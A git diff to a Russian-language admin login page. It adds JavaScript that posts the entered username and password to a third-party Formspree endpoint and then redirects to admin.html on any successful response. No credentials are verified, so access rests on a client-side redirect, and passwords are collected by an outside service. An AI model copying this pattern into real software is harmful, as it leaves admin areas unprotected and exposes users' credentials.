--- a/login.html
+++ b/login.html
@@ -4,14 +4,44 @@
     <meta charset="UTF-8">
     <meta name="viewport" content="width=device-width, initial-scale=1.0">
     <title>Вход в панель администратора</title>
+    <script>
+        function handleSubmit(event) {
+            event.preventDefault(); // Предотвращаем стандартное поведение формы
+
+            const form = event.target;
+            const formData = new FormData(form);
+
+            fetch(form.action, {
+                method: 'POST',
+                body: formData,
+                headers: {
+                    'Accept': 'application/json'
+                }
+            })
+            .then(response => {
+                if (response.ok) {
+                    // Перенаправляем на панель администратора
+                    window.location.href = 'admin.html';
+                } else {
+                    alert('Ошибка при отправке формы. Попробуйте еще раз.');
+                }
+            })
+            .catch(error => {
+                console.error('Ошибка:', error);
+                alert('Ошибка при отправке формы. Попробуйте еще раз.');
+            });
+        }
+    </script>
 </head>
 <body>
     <h1>Вход в панель администратора</h1>
-    <form action="https://formspree.io/f/mzzrejjd" method="POST">
+    <form action="https://formspree.io/f/mzzrejjd" method="POST" onsubmit="handleSubmit(event)">
         <label for="username">Логин:</label>
         <input type="text" id="username" name="username" required>
+        <br>
         <label for="password">Пароль:</label>
         <input type="password" id="password" name="password" required>
+        <br>
         <button type="submit">Войти</button>
     </form>
 </body>
